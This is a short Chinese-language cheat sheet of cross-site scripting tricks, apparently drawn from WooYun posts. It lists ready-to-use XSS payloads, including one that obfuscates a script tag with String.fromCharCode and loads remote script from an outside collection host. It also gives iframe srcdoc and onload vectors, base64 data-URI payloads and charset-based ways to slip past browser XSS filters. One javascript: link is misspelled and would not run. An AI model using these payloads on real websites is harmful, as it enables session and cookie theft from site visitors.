XSS一些小技巧

1、http://www.wooyun.org/bugs/wooyun-2013-034003

<textarea/>"><img src=1 onerror="with(document)body.appendChild(createElement(String.fromCharCode(115,99,114,105,112,116))).src='//pxss.sinaapp.com/l6OBji'">

<textarea/><iframe src=http://www.baidu.com/></iframe>

2、只有数据包中http头含有X-XSS-Protection并且值为0的时候,浏览器才不会开启xss filter。

3、可以利用字符编码来绕过XSS Filter的方法,当编码是is-2022-kr时浏览器会忽略%0f,这样我们在onerror后面加个%0f就能绕过filter,前提是注入一个<meta charset=ISO-2022-KR>

4、<iframe srcdoc='<script>alert(1)</script>'>

不是以on开头的 又可以执行JS的iframe属性。

5、

<a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=>aa</a>

6、

<a href=javascirpt:alert(1)>请点击</a>

7、

<iframe/onload=alert(1)>

8、

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWHNzVGVzdCIpOzwvc2NyaXB0Pg=="></object>

9、一些有趣的XSS Vector

http://zone.wooyun.org/content/15121
大爷,赏个铜板呗!